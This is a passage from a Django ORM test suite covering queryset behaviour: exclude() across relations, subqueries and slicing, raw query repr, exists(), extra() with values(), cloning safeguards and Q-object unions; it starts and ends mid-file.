        info_first = (by_info | by_note).filter(note=self.n1)
        self.assertQuerysetEqual(info_first, ['<ExtraInfo: e1>'])
class Queries6Tests(TestCase):
    @classmethod
    def setUpTestData(cls):
        # Tag tree: t1 -> (t2, t3); t3 -> (t4, t5). Only t1 and t2 have a
        # category. Annotation a1 points at t1 (and note n1), a2 at t4.
        generic = NamedCategory.objects.create(name="Generic")
        t1 = Tag.objects.create(name='t1', category=generic)
        Tag.objects.create(name='t2', parent=t1, category=generic)
        t3 = Tag.objects.create(name='t3', parent=t1)
        t4 = Tag.objects.create(name='t4', parent=t3)
        Tag.objects.create(name='t5', parent=t3)
        n1 = Note.objects.create(note='n1', misc='foo', id=1)
        ann1 = Annotation.objects.create(name='a1', tag=t1)
        ann1.notes.add(n1)
        Annotation.objects.create(name='a2', tag=t4)

    def test_parallel_iterators(self):
        # Test that parallel iterators work: two iterators over the same
        # queryset advance independently.
        qs = Tag.objects.all()
        i1, i2 = iter(qs), iter(qs)
        self.assertEqual(repr(next(i1)), '<Tag: t1>')
        self.assertEqual(repr(next(i1)), '<Tag: t2>')
        self.assertEqual(repr(next(i2)), '<Tag: t1>')
        self.assertEqual(repr(next(i2)), '<Tag: t2>')
        self.assertEqual(repr(next(i2)), '<Tag: t3>')
        self.assertEqual(repr(next(i1)), '<Tag: t3>')

        # bool() on a queryset is stable across repeated evaluation.
        qs = X.objects.all()
        self.assertEqual(bool(qs), False)
        self.assertEqual(bool(qs), False)

    def test_nested_queries_sql(self):
        # Nested queries should not evaluate the inner query as part of constructing the
        # SQL (so we should see a nested query here, indicated by two "SELECT" calls).
        qs = Annotation.objects.filter(notes__in=Note.objects.filter(note="xyzzy"))
        self.assertEqual(
            qs.query.get_compiler(qs.db).as_sql()[0].count('SELECT'),
            2
        )

    def test_tickets_8921_9188(self):
        # Incorrect SQL was being generated for certain types of exclude()
        # queries that crossed multi-valued relations (#8921, #9188 and some
        # pre-emptively discovered cases).
        self.assertQuerysetEqual(
            PointerA.objects.filter(connection__pointerb__id=1),
            []
        )
        self.assertQuerysetEqual(
            PointerA.objects.exclude(connection__pointerb__id=1),
            []
        )

        self.assertQuerysetEqual(
            Tag.objects.exclude(children=None),
            ['<Tag: t1>', '<Tag: t3>']
        )

        # This example is tricky because the parent could be NULL, so only checking
        # parents with annotations omits some results (tag t1, in this case).
        self.assertQuerysetEqual(
            Tag.objects.exclude(parent__annotation__name="a1"),
            ['<Tag: t1>', '<Tag: t4>', '<Tag: t5>']
        )

        # The annotation->tag link is single values and tag->children links is
        # multi-valued. So we have to split the exclude filter in the middle
        # and then optimize the inner query without losing results.
        self.assertQuerysetEqual(
            Annotation.objects.exclude(tag__children__name="t2"),
            ['<Annotation: a2>']
        )

        # Nested queries are possible (although should be used with care, since
        # they have performance problems on backends like MySQL.
        self.assertQuerysetEqual(
            Annotation.objects.filter(notes__in=Note.objects.filter(note="n1")),
            ['<Annotation: a1>']
        )

    def test_ticket3739(self):
        # The all() method on querysets returns a copy of the queryset.
        q1 = Tag.objects.order_by('name')
        self.assertIsNot(q1, q1.all())

    def test_ticket_11320(self):
        # Chained excludes over the same nullable FK should reuse one join.
        qs = Tag.objects.exclude(category=None).exclude(category__name='foo')
        self.assertEqual(str(qs.query).count(' INNER JOIN '), 1)
class RawQueriesTests(TestCase):
    def setUp(self):
        Note.objects.create(note='n1', misc='foo', id=1)

    def test_ticket14729(self):
        # repr() of a raw queryset interpolates the parameters passed as a
        # list into the displayed SQL (refs #14729).
        single_param = Note.objects.raw(
            "SELECT * FROM queries_note WHERE note = %s", params=['n1'])
        self.assertEqual(
            repr(single_param),
            "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1>")

        two_params = Note.objects.raw(
            "SELECT * FROM queries_note WHERE note = %s and misc = %s",
            params=['n1', 'foo'])
        self.assertEqual(
            repr(two_params),
            "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1 and misc = foo>")
class GeneratorExpressionTests(TestCase):
    def test_ticket10432(self):
        # Using an empty generator expression as the rvalue for an "__in"
        # lookup is legal. NOTE: the generator expression itself is the
        # regression being tested (refs #10432) -- do not simplify it to a
        # list or iter().
        self.assertQuerysetEqual(
            Note.objects.filter(pk__in=(x for x in ())),
            []
        )
class ComparisonTests(TestCase):
    def setUp(self):
        self.n1 = Note.objects.create(note='n1', misc='foo', id=1)
        e1 = ExtraInfo.objects.create(info='e1', note=self.n1)
        self.a2 = Author.objects.create(name='a2', num=2002, extra=e1)

    def test_ticket8597(self):
        # Regression tests for case-insensitive comparisons: '%' and '_'
        # in the lookup value must be treated literally (refs #8597).
        for item_name in ("a_b", "x%y"):
            Item.objects.create(name=item_name, created=datetime.datetime.now(),
                                creator=self.a2, note=self.n1)

        cases = [
            ({'name__iexact': "A_b"}, ['<Item: a_b>']),
            ({'name__iexact': "x%Y"}, ['<Item: x%y>']),
            ({'name__istartswith': "A_b"}, ['<Item: a_b>']),
            ({'name__iendswith': "A_b"}, ['<Item: a_b>']),
        ]
        for lookup, expected in cases:
            self.assertQuerysetEqual(Item.objects.filter(**lookup), expected)
class ExistsSql(TestCase):
    def test_exists(self):
        with CaptureQueriesContext(connection) as captured_queries:
            self.assertFalse(Tag.objects.exists())
        # Ok - so the exist query worked - but did it include too many columns?
        self.assertEqual(len(captured_queries), 1)
        # Each captured entry is a dict ({'sql': ..., 'time': ...}); inspect
        # the SQL string itself. Previously the dict was checked, so the
        # assertNotIn() calls below tested dict keys and passed vacuously.
        qstr = captured_queries[0]['sql'].lower()
        id_col = connection.ops.quote_name('id')
        name_col = connection.ops.quote_name('name')
        self.assertNotIn(id_col.lower(), qstr)
        self.assertNotIn(name_col.lower(), qstr)

    def test_ticket_18414(self):
        # exists() works with distinct() and with sliced querysets
        # (refs #18414).
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='two', created=datetime.datetime.now())
        self.assertTrue(Article.objects.exists())
        self.assertTrue(Article.objects.distinct().exists())
        self.assertTrue(Article.objects.distinct()[1:3].exists())
        self.assertFalse(Article.objects.distinct()[1:1].exists())

    @unittest.skipUnless(connection.features.can_distinct_on_fields,
                         'Uses distinct(fields)')
    def test_ticket_18414_distinct_on(self):
        # Same as above with DISTINCT ON: two distinct names exist, a third
        # does not (refs #18414).
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='two', created=datetime.datetime.now())
        self.assertTrue(Article.objects.distinct('name').exists())
        self.assertTrue(Article.objects.distinct('name')[1:2].exists())
        self.assertFalse(Article.objects.distinct('name')[2:3].exists())
class QuerysetOrderedTests(unittest.TestCase):
    """Tests for the QuerySet.ordered attribute."""

    def test_no_default_or_explicit_ordering(self):
        self.assertEqual(Annotation.objects.all().ordered, False)

    def test_cleared_default_ordering(self):
        meta_ordered = Tag.objects.all()
        self.assertEqual(meta_ordered.ordered, True)
        # A bare order_by() clears the Meta ordering.
        self.assertEqual(meta_ordered.order_by().ordered, False)

    def test_explicit_ordering(self):
        self.assertEqual(Annotation.objects.all().order_by('id').ordered, True)

    def test_order_by_extra(self):
        self.assertEqual(Annotation.objects.all().extra(order_by=['id']).ordered, True)

    def test_annotated_ordering(self):
        annotated = Annotation.objects.annotate(num_notes=Count('notes'))
        self.assertEqual(annotated.ordered, False)
        # Ordering by the annotation makes the queryset ordered.
        self.assertEqual(annotated.order_by('num_notes').ordered, True)
@skipUnlessDBFeature('allow_sliced_subqueries')
class SubqueryTests(TestCase):
    @classmethod
    def setUpTestData(cls):
        # Four rows with explicit ids 1..4 so the slice assertions below can
        # reason about exact id sets.
        DumbCategory.objects.create(id=1)
        DumbCategory.objects.create(id=2)
        DumbCategory.objects.create(id=3)
        DumbCategory.objects.create(id=4)

    def test_ordered_subselect(self):
        "Subselects honor any manual ordering"
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])
        self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})

        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[:2])
        self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})

        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2])
        self.assertEqual(set(query.values_list('id', flat=True)), {3})

        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])
        self.assertEqual(set(query.values_list('id', flat=True)), {1, 2})

    def test_slice_subquery_and_query(self):
        """
        Slice a query that has a sliced subquery
        """
        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])[0:2]
        self.assertEqual({x.id for x in query}, {3, 4})

        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:3])[1:3]
        self.assertEqual({x.id for x in query}, {3})

        query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])[1:]
        self.assertEqual({x.id for x in query}, {2})

    def test_related_sliced_subquery(self):
        """
        Related objects constraints can safely contain sliced subqueries.
        refs #22434
        """
        generic = NamedCategory.objects.create(id=5, name="Generic")
        t1 = Tag.objects.create(name='t1', category=generic)
        t2 = Tag.objects.create(name='t2', category=generic)
        ManagedModel.objects.create(data='mm1', tag=t1, public=True)
        mm2 = ManagedModel.objects.create(data='mm2', tag=t2, public=True)

        query = ManagedModel.normal_manager.filter(
            tag__in=Tag.objects.order_by('-id')[:1]
        )
        self.assertEqual({x.id for x in query}, {mm2.id})

    def test_sliced_delete(self):
        "Delete queries can safely contain sliced subqueries"
        # Each delete removes the highest remaining id via a sliced subquery.
        DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:1]).delete()
        self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 2, 3})

        DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2]).delete()
        self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 3})

        DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:]).delete()
        self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {3})
class CloneTests(TestCase):
    def test_evaluated_queryset_as_argument(self):
        "#13227 -- If a queryset is already evaluated, it can still be used as a query arg"
        n = Note(note='Test1', misc='misc')
        n.save()
        e = ExtraInfo(info='good', note=n)
        e.save()

        n_list = Note.objects.all()
        # Evaluate the Note queryset, populating the query cache
        list(n_list)
        # Use the note queryset in a query, and evaluate
        # that query in a way that involves cloning.
        self.assertEqual(ExtraInfo.objects.filter(note__in=n_list)[0].info, 'good')

    def test_no_model_options_cloning(self):
        """
        Test that cloning a queryset does not get out of hand. While complete
        testing is impossible, this is a sanity check against invalid use of
        deepcopy. refs #16759.
        """
        opts_class = type(Note._meta)
        note_deepcopy = getattr(opts_class, "__deepcopy__", None)
        # Patch __deepcopy__ so any deepcopy of Model options fails the test.
        opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model options shouldn't be cloned.")
        try:
            Note.objects.filter(pk__lte=F('pk') + 1).all()
        finally:
            # Restore (or remove) the patched hook so other tests are
            # unaffected even if the assertion above fired.
            if note_deepcopy is None:
                delattr(opts_class, "__deepcopy__")
            else:
                opts_class.__deepcopy__ = note_deepcopy

    def test_no_fields_cloning(self):
        """
        Test that cloning a queryset does not get out of hand. While complete
        testing is impossible, this is a sanity check against invalid use of
        deepcopy. refs #16759.
        """
        opts_class = type(Note._meta.get_field("misc"))
        note_deepcopy = getattr(opts_class, "__deepcopy__", None)
        # Patch __deepcopy__ so any deepcopy of a model field fails the test.
        opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model fields shouldn't be cloned")
        try:
            Note.objects.filter(note=F('misc')).all()
        finally:
            # Restore (or remove) the patched hook so other tests are
            # unaffected even if the assertion above fired.
            if note_deepcopy is None:
                delattr(opts_class, "__deepcopy__")
            else:
                opts_class.__deepcopy__ = note_deepcopy
class EmptyQuerySetTests(TestCase):
    def test_emptyqueryset_values(self):
        # #14366 -- Calling .values() on an empty QuerySet and then cloning
        # that should not cause an error
        empty_values = Number.objects.none().values('num').order_by('num')
        self.assertQuerysetEqual(empty_values, [])

    def test_values_subquery(self):
        # An empty queryset is usable as an "__in" subquery via values() and
        # via values_list() alike.
        subqueries = (
            Number.objects.none().values("pk"),
            Number.objects.none().values_list("pk"),
        )
        for subquery in subqueries:
            self.assertQuerysetEqual(
                Number.objects.filter(pk__in=subquery), [])

    def test_ticket_19151(self):
        # #19151 -- Calling .values() or .values_list() on an empty QuerySet
        # should return an empty QuerySet and not cause an error.
        empty = Author.objects.none()
        self.assertQuerysetEqual(empty.values(), [])
        self.assertQuerysetEqual(empty.values_list(), [])
class ValuesQuerysetTests(BaseQuerysetTest):
    @classmethod
    def setUpTestData(cls):
        Number.objects.create(num=72)
        # Identity transform handed to assertQuerysetEqual so that
        # values()/values_list() rows are compared as-is.
        cls.identity = staticmethod(lambda x: x)

    def test_flat_values_list(self):
        qs = Number.objects.values_list("num")
        qs = qs.values_list("num", flat=True)
        self.assertValueQuerysetEqual(qs, [72])

    def test_extra_values(self):
        # testing for ticket 14930 issues
        qs = Number.objects.extra(select=OrderedDict([('value_plus_x', 'num+%s'),
                                                      ('value_minus_x', 'num-%s')]),
                                  select_params=(1, 2))
        qs = qs.order_by('value_minus_x')
        qs = qs.values('num')
        self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)

    def test_extra_values_order_twice(self):
        # testing for ticket 14930 issues
        qs = Number.objects.extra(select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'})
        qs = qs.order_by('value_minus_one').order_by('value_plus_one')
        qs = qs.values('num')
        self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)

    def test_extra_values_order_multiple(self):
        # Postgres doesn't allow constants in order by, so check for that.
        qs = Number.objects.extra(select={
            'value_plus_one': 'num+1',
            'value_minus_one': 'num-1',
            'constant_value': '1'
        })
        qs = qs.order_by('value_plus_one', 'value_minus_one', 'constant_value')
        qs = qs.values('num')
        self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)

    def test_extra_values_order_in_extra(self):
        # testing for ticket 14930 issues
        qs = Number.objects.extra(
            select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'},
            order_by=['value_minus_one'])
        qs = qs.values('num')
        # Previously the queryset was built but never evaluated, so this
        # test asserted nothing (querysets are lazy). Evaluate and verify
        # like the sibling tests do.
        self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)

    def test_extra_select_params_values_order_in_extra(self):
        # testing for 23259 issue
        qs = Number.objects.extra(
            select={'value_plus_x': 'num+%s'},
            select_params=[1],
            order_by=['value_plus_x'])
        qs = qs.filter(num=72)
        qs = qs.values('num')
        self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)

    def test_extra_multiple_select_params_values_order_by(self):
        # testing for 23259 issue
        qs = Number.objects.extra(select=OrderedDict([('value_plus_x', 'num+%s'),
                                                      ('value_minus_x', 'num-%s')]),
                                  select_params=(72, 72))
        qs = qs.order_by('value_minus_x')
        qs = qs.filter(num=1)
        qs = qs.values('num')
        self.assertQuerysetEqual(qs, [], self.identity)

    def test_extra_values_list(self):
        # testing for ticket 14930 issues
        qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
        qs = qs.order_by('value_plus_one')
        qs = qs.values_list('num')
        self.assertQuerysetEqual(qs, [(72,)], self.identity)

    def test_flat_extra_values_list(self):
        # testing for ticket 14930 issues
        qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
        qs = qs.order_by('value_plus_one')
        qs = qs.values_list('num', flat=True)
        self.assertQuerysetEqual(qs, [72], self.identity)

    def test_field_error_values_list(self):
        # see #23443
        with self.assertRaisesMessage(FieldError,
                "Cannot resolve keyword %r into field."
                " Join on 'name' not permitted." % 'foo'):
            Tag.objects.values_list('name__foo')
class QuerySetSupportsPythonIdioms(TestCase):
    """QuerySets support indexing, slicing, len() and &/| combination."""

    @classmethod
    def setUpTestData(cls):
        # Seven articles sharing one timestamp; names give a stable ordering.
        some_date = datetime.datetime(2014, 5, 16, 12, 1)
        for i in range(1, 8):
            Article.objects.create(
                name="Article {}".format(i), created=some_date)

    def get_ordered_articles(self):
        # Fresh queryset on every call so slicing tests never share a cache.
        return Article.objects.all().order_by('name')

    def test_can_get_items_using_index_and_slice_notation(self):
        self.assertEqual(self.get_ordered_articles()[0].name, 'Article 1')
        self.assertQuerysetEqual(self.get_ordered_articles()[1:3],
            ["<Article: Article 2>", "<Article: Article 3>"])

    def test_slicing_with_steps_can_be_used(self):
        self.assertQuerysetEqual(self.get_ordered_articles()[::2],
            ["<Article: Article 1>",
             "<Article: Article 3>",
             "<Article: Article 5>",
             "<Article: Article 7>"])

    @unittest.skipUnless(six.PY2, "Python 2 only -- Python 3 doesn't have longs.")
    def test_slicing_works_with_longs(self):
        self.assertEqual(self.get_ordered_articles()[long(0)].name, 'Article 1')
        self.assertQuerysetEqual(self.get_ordered_articles()[long(1):long(3)],
            ["<Article: Article 2>", "<Article: Article 3>"])
        self.assertQuerysetEqual(self.get_ordered_articles()[::long(2)],
            ["<Article: Article 1>",
             "<Article: Article 3>",
             "<Article: Article 5>",
             "<Article: Article 7>"])
        # And can be mixed with ints.
        self.assertQuerysetEqual(self.get_ordered_articles()[1:long(3)],
            ["<Article: Article 2>", "<Article: Article 3>"])

    def test_slicing_without_step_is_lazy(self):
        # A plain start:stop slice only records LIMIT/OFFSET -- no query yet.
        with self.assertNumQueries(0):
            self.get_ordered_articles()[0:5]

    def test_slicing_with_tests_is_not_lazy(self):
        # A stepped slice must fetch rows to apply the step, so one query runs.
        with self.assertNumQueries(1):
            self.get_ordered_articles()[0:5:3]

    def test_slicing_can_slice_again_after_slicing(self):
        self.assertQuerysetEqual(self.get_ordered_articles()[0:5][0:2],
            ["<Article: Article 1>",
             "<Article: Article 2>"])
        self.assertQuerysetEqual(self.get_ordered_articles()[0:5][4:],
            ["<Article: Article 5>"])
        self.assertQuerysetEqual(self.get_ordered_articles()[0:5][5:], [])
        # Some more tests!
        self.assertQuerysetEqual(self.get_ordered_articles()[2:][0:2],
            ["<Article: Article 3>", "<Article: Article 4>"])
        self.assertQuerysetEqual(self.get_ordered_articles()[2:][:2],
            ["<Article: Article 3>", "<Article: Article 4>"])
        self.assertQuerysetEqual(self.get_ordered_articles()[2:][2:3],
            ["<Article: Article 5>"])
        # Using an offset without a limit is also possible.
        self.assertQuerysetEqual(self.get_ordered_articles()[5:],
            ["<Article: Article 6>",
             "<Article: Article 7>"])

    def test_slicing_cannot_filter_queryset_once_sliced(self):
        six.assertRaisesRegex(
            self,
            AssertionError,
            "Cannot filter a query once a slice has been taken.",
            Article.objects.all()[0:5].filter,
            id=1,
        )

    def test_slicing_cannot_reorder_queryset_once_sliced(self):
        six.assertRaisesRegex(
            self,
            AssertionError,
            "Cannot reorder a query once a slice has been taken.",
            Article.objects.all()[0:5].order_by,
            'id',
        )

    def test_slicing_cannot_combine_queries_once_sliced(self):
        six.assertRaisesRegex(
            self,
            AssertionError,
            "Cannot combine queries once a slice has been taken.",
            lambda: Article.objects.all()[0:1] & Article.objects.all()[4:5]
        )

    def test_slicing_negative_indexing_not_supported_for_single_element(self):
        """hint: inverting your ordering might do what you need"""
        six.assertRaisesRegex(
            self,
            AssertionError,
            "Negative indexing is not supported.",
            lambda: Article.objects.all()[-1]
        )

    def test_slicing_negative_indexing_not_supported_for_range(self):
        """hint: inverting your ordering might do what you need"""
        six.assertRaisesRegex(
            self,
            AssertionError,
            "Negative indexing is not supported.",
            lambda: Article.objects.all()[0:-5]
        )

    def test_can_get_number_of_items_in_queryset_using_standard_len(self):
        self.assertEqual(len(Article.objects.filter(name__exact='Article 1')), 1)

    def test_can_combine_queries_using_and_and_or_operators(self):
        s1 = Article.objects.filter(name__exact='Article 1')
        s2 = Article.objects.filter(name__exact='Article 2')
        self.assertQuerysetEqual((s1 | s2).order_by('name'),
            ["<Article: Article 1>",
             "<Article: Article 2>"])
        # ANDing two disjoint filters yields the empty queryset.
        self.assertQuerysetEqual(s1 & s2, [])
class WeirdQuerysetSlicingTests(BaseQuerysetTest):
    """Edge-case slicing: zero-length slices and slices of slices."""

    @classmethod
    def setUpTestData(cls):
        Number.objects.create(num=1)
        Number.objects.create(num=2)
        Article.objects.create(name='one', created=datetime.datetime.now())
        Article.objects.create(name='two', created=datetime.datetime.now())
        Article.objects.create(name='three', created=datetime.datetime.now())
        Article.objects.create(name='four', created=datetime.datetime.now())

    def test_tickets_7698_10202(self):
        # People like to slice with '0' as the high-water mark.
        self.assertQuerysetEqual(Article.objects.all()[0:0], [])
        self.assertQuerysetEqual(Article.objects.all()[0:0][:10], [])
        self.assertEqual(Article.objects.all()[:0].count(), 0)
        # A zero-limit slice is still a slice: further changes are rejected.
        self.assertRaisesMessage(
            AssertionError,
            'Cannot change a query once a slice has been taken.',
            Article.objects.all()[:0].latest, 'created'
        )

    def test_empty_resultset_sql(self):
        # ticket #12192
        # A provably-empty slice ([1:1]) must not hit the database at all.
        self.assertNumQueries(0, lambda: list(Number.objects.all()[1:1]))
class EscapingTests(TestCase):
    def test_ticket_7302(self):
        """Reserved column names are properly quoted in generated SQL."""
        for name, order in (('a', 42), ('b', 37)):
            ReservedName.objects.create(name=name, order=order)
        expected = ['<ReservedName: b>', '<ReservedName: a>']
        # Ordering directly on the reserved column name.
        self.assertQuerysetEqual(
            ReservedName.objects.all().order_by('order'),
            expected
        )
        # Ordering that mixes the reserved column with an extra() alias.
        self.assertQuerysetEqual(
            ReservedName.objects.extra(select={'stuff': 'name'}, order_by=('order', 'stuff')),
            expected
        )
class ToFieldTests(TestCase):
    """Lookups across the Food/Eaten and self-referential Node relations."""

    def test_in_query(self):
        apple = Food.objects.create(name="apple")
        pear = Food.objects.create(name="pear")
        meals = {
            Eaten.objects.create(food=apple, meal="lunch"),
            Eaten.objects.create(food=pear, meal="dinner"),
        }
        self.assertEqual(set(Eaten.objects.filter(food__in=[apple, pear])), meals)

    def test_reverse_in(self):
        apple = Food.objects.create(name="apple")
        pear = Food.objects.create(name="pear")
        apple_meal = Eaten.objects.create(food=apple, meal="lunch")
        pear_meal = Eaten.objects.create(food=pear, meal="dinner")
        self.assertEqual(
            set(Food.objects.filter(eaten__in=[apple_meal, pear_meal])),
            {apple, pear},
        )

    def test_single_object(self):
        apple = Food.objects.create(name="apple")
        meals = {
            Eaten.objects.create(food=apple, meal="lunch"),
            Eaten.objects.create(food=apple, meal="dinner"),
        }
        self.assertEqual(set(Eaten.objects.filter(food=apple)), meals)

    def test_single_object_reverse(self):
        apple = Food.objects.create(name="apple")
        lunch = Eaten.objects.create(food=apple, meal="lunch")
        self.assertEqual(set(Food.objects.filter(eaten=lunch)), {apple})

    def test_recursive_fk(self):
        # Filtering on the forward side of a self-referential FK.
        parent = Node.objects.create(num=42)
        child = Node.objects.create(num=1, parent=parent)
        self.assertEqual(list(Node.objects.filter(parent=parent)), [child])

    def test_recursive_fk_reverse(self):
        # ... and on the reverse side of the same relation.
        parent = Node.objects.create(num=42)
        child = Node.objects.create(num=1, parent=parent)
        self.assertEqual(list(Node.objects.filter(node=child)), [parent])
class ConditionalTests(BaseQuerysetTest):
    """Tests whose execution depend on different environment conditions like
    Python version or DB backend features"""

    @classmethod
    def setUpTestData(cls):
        # A small tag tree: t1 -> (t2, t3), t3 -> (t4, t5).
        generic = NamedCategory.objects.create(name="Generic")
        t1 = Tag.objects.create(name='t1', category=generic)
        Tag.objects.create(name='t2', parent=t1, category=generic)
        t3 = Tag.objects.create(name='t3', parent=t1)
        Tag.objects.create(name='t4', parent=t3)
        Tag.objects.create(name='t5', parent=t3)

    def test_infinite_loop(self):
        # If you're not careful, it's possible to introduce infinite loops via
        # default ordering on foreign keys in a cycle. We detect that.
        self.assertRaisesMessage(
            FieldError,
            'Infinite loop caused by ordering.',
            lambda: list(LoopX.objects.all())  # Force queryset evaluation with list()
        )
        self.assertRaisesMessage(
            FieldError,
            'Infinite loop caused by ordering.',
            lambda: list(LoopZ.objects.all())  # Force queryset evaluation with list()
        )
        # Note that this doesn't cause an infinite loop, since the default
        # ordering on the Tag model is empty (and thus defaults to using "id"
        # for the related field).
        self.assertEqual(len(Tag.objects.order_by('parent')), 5)
        # ... but you can still order in a non-recursive fashion among linked
        # fields (the previous test failed because the default ordering was
        # recursive).
        self.assertQuerysetEqual(
            LoopX.objects.all().order_by('y__x__y__x__id'),
            []
        )

    # When grouping without specifying ordering, we add an explicit "ORDER BY NULL"
    # portion in MySQL to prevent unnecessary sorting.
    @skipUnlessDBFeature('requires_explicit_null_ordering_when_grouping')
    def test_null_ordering_added(self):
        query = Tag.objects.values_list('parent_id', flat=True).order_by().query
        query.group_by = ['parent_id']
        sql = query.get_compiler(DEFAULT_DB_ALIAS).as_sql()[0]
        fragment = "ORDER BY "
        pos = sql.find(fragment)
        # Exactly one ORDER BY clause in the SQL ...
        self.assertEqual(sql.find(fragment, pos + 1), -1)
        # ... and it is immediately followed by NULL.
        self.assertEqual(sql.find("NULL", pos + len(fragment)), pos + len(fragment))

    # Sqlite 3 does not support passing in more than 1000 parameters except by
    # changing a parameter at compilation time.
    @skipUnlessDBFeature('supports_1000_query_parameters')
    def test_ticket14244(self):
        # Test that the "in" lookup works with lists of 1000 items or more.
        # The numbers amount is picked to force three different IN batches
        # for Oracle, yet to be less than 2100 parameter limit for MSSQL.
        numbers = list(range(2050))
        Number.objects.all().delete()
        Number.objects.bulk_create(Number(num=num) for num in numbers)
        self.assertEqual(
            Number.objects.filter(num__in=numbers[:1000]).count(),
            1000
        )
        self.assertEqual(
            Number.objects.filter(num__in=numbers[:1001]).count(),
            1001
        )
        self.assertEqual(
            Number.objects.filter(num__in=numbers[:2000]).count(),
            2000
        )
        self.assertEqual(
            Number.objects.filter(num__in=numbers).count(),
            len(numbers)
        )
class UnionTests(unittest.TestCase):
    """
    Tests for the union of two querysets. Bug #12252.
    """
    def setUp(self):
        # Bug fix: this fixture was previously declared as a
        # ``setUpTestData`` classmethod, but that hook belongs to
        # django.test.TestCase and is never invoked by plain
        # unittest.TestCase -- no rows were created and every test below
        # passed vacuously (empty set == empty set). Plain setUp() runs
        # before each test as intended.
        objectas = []
        objectbs = []
        a_info = ['one', 'two', 'three']
        for name in a_info:
            o = ObjectA(name=name)
            o.save()
            objectas.append(o)
        b_info = [('un', 1, objectas[0]), ('deux', 2, objectas[0]), ('trois', 3, objectas[2])]
        for name, number, objecta in b_info:
            o = ObjectB(name=name, num=number, objecta=objecta)
            o.save()
            objectbs.append(o)
        # The created ObjectC rows only need to exist; no accumulator kept.
        c_info = [('ein', objectas[2], objectbs[2]), ('zwei', objectas[1], objectbs[1])]
        for name, objecta, objectb in c_info:
            ObjectC.objects.create(name=name, objecta=objecta, objectb=objectb)

    def check_union(self, model, Q1, Q2):
        """Assert filter(Q1) | filter(Q2) == filter(Q1 | Q2), both ways round."""
        # Renamed from ``filter`` to avoid shadowing the builtin.
        filter_ = model.objects.filter
        self.assertEqual(set(filter_(Q1) | filter_(Q2)), set(filter_(Q1 | Q2)))
        self.assertEqual(set(filter_(Q2) | filter_(Q1)), set(filter_(Q1 | Q2)))

    def test_A_AB(self):
        Q1 = Q(name='two')
        Q2 = Q(objectb__name='deux')
        self.check_union(ObjectA, Q1, Q2)

    def test_A_AB2(self):
        Q1 = Q(name='two')
        Q2 = Q(objectb__name='deux', objectb__num=2)
        self.check_union(ObjectA, Q1, Q2)

    def test_AB_ACB(self):
        Q1 = Q(objectb__name='deux')
        Q2 = Q(objectc__objectb__name='deux')
        self.check_union(ObjectA, Q1, Q2)

    def test_BAB_BAC(self):
        Q1 = Q(objecta__objectb__name='deux')
        Q2 = Q(objecta__objectc__name='ein')
        self.check_union(ObjectB, Q1, Q2)

    def test_BAB_BACB(self):
        Q1 = Q(objecta__objectb__name='deux')
        Q2 = Q(objecta__objectc__objectb__name='trois')
        self.check_union(ObjectB, Q1, Q2)

    def test_BA_BCA__BAB_BAC_BCA(self):
        Q1 = Q(objecta__name='one', objectc__objecta__name='two')
        Q2 = Q(objecta__objectc__name='ein', objectc__objecta__name='three', objecta__objectb__name='trois')
        self.check_union(ObjectB, Q1, Q2)
class DefaultValuesInsertTest(TestCase):
    def test_no_extra_params(self):
        """
        Ticket #17056 -- affects Oracle: creating an instance of a model
        whose only field is the primary key must not blow up.
        """
        msg = ("Creation of an instance of a model with only the PK field "
               "shouldn't error out after bulk insert refactoring (#17056)")
        try:
            DumbCategory.objects.create()
        except TypeError:
            self.fail(msg)
class ExcludeTests(TestCase):
    """exclude() across foreign-key and many-to-many relations."""

    @classmethod
    def setUpTestData(cls):
        # Only 'apples' has an Eaten row; only 'Manager' has the golf duty.
        f1 = Food.objects.create(name='apples')
        Food.objects.create(name='oranges')
        Eaten.objects.create(food=f1, meal='dinner')
        j1 = Job.objects.create(name='Manager')
        r1 = Responsibility.objects.create(description='Playing golf')
        j2 = Job.objects.create(name='Programmer')
        r2 = Responsibility.objects.create(description='Programming')
        JobResponsibilities.objects.create(job=j1, responsibility=r1)
        JobResponsibilities.objects.create(job=j2, responsibility=r2)

    def test_to_field(self):
        # Excluding through the relation keeps only the unrelated rows.
        self.assertQuerysetEqual(
            Food.objects.exclude(eaten__meal='dinner'),
            ['<Food: oranges>'])
        self.assertQuerysetEqual(
            Job.objects.exclude(responsibilities__description='Playing golf'),
            ['<Job: Programmer>'])
        self.assertQuerysetEqual(
            Responsibility.objects.exclude(jobs__name='Manager'),
            ['<Responsibility: Programming>'])

    def test_ticket14511(self):
        alex = Person.objects.get_or_create(name='Alex')[0]
        jane = Person.objects.get_or_create(name='Jane')[0]
        oracle = Company.objects.get_or_create(name='Oracle')[0]
        google = Company.objects.get_or_create(name='Google')[0]
